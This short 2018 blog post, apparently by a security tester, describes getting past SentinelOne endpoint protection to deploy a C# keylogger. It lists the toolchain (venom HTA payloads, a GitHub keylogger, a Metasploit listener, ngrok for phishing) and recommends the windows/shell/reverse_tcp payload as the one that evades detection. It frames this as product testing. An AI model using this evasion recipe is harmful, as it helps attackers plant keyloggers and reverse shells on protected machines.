Bypass SentinelOne with Metasploit and Deploy C# Keylogger

emmanuellws
Apr 24, 2018
1 min read

Before I hit the test with Annabelle Ransomware on my test machine protected by SentinelOne, I found my way around SentinelOne and able to bypass and deploy keylogger using Metasploit and C# keylogger.

Here is the full video

These are the tools I used to generate and exploit through SentinelOne:

1) https://github.com/r00t-3xp10it/venom (use HTA payloads only)

2) https://github.com/cristian-henrique/csharp-keylogger

3) Metasploit - fire up listener and wait for HTA to be executed

4) NGROK tunneling (for phishing address demo purposes)

SentinelOne, is one of the most advanced NetGenAV that I ever came across with, that uses solely Behavioral detections and protections. Due to this, it is only consider as ONE layer of behavioral protection. I like it for being light and powerful. But, I still think that Signature, Firewall and BIG DATA of Application Whitelisting is still required. I like their Rollback feature, but there is always a room for error in their "Rollback" feature.

Well, I could bypass Panda Adaptive Defense too, but their Whitelisting made it hard for me to deploy keylogger such as in this video.

In case you want to try it yourself, please set the payload to "windows/shell/reverse_tcp". Other payloads are already discovered and blocked by SentinelOne except this. SentinelOne is very successfull at detecting and blocking exploits paylaod generated through Empire, Veil and Metasploit.

Carbon Black, bypassed and C# Keylogger Deployed Successfully.

Bypass SentinelOne with Metasploit and Deploy C# Keylogger

Annabelle Ransomware bypassing SentinelOne in Full Protection Mode

Bypass SentinelOne with Metasploit and Deploy C# Keylogger

Comments